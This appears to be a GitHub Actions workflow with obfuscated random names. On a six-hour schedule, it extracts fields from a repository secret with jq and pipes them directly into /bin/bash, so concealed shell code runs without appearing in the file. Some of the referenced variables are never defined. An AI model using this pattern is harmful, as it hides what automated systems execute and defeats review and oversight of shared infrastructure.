name: tupaoap

on:
  workflow_dispatch:
  schedule:
    - cron: '18 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tupaoap
        env:
          gdmct19890: ${{ secrets.gdmct19890 }}
        run: |
          echo $gdmct19890 | jq -r .kfy9982 | /bin/bash
          echo $jygya9 | jq -r .ewgyd316 | /bin/bash
          echo $xly84446 | jq -r .nsja74887 | /bin/bash
          echo $hdysd4 | jq -r .y94781 | /bin/bash

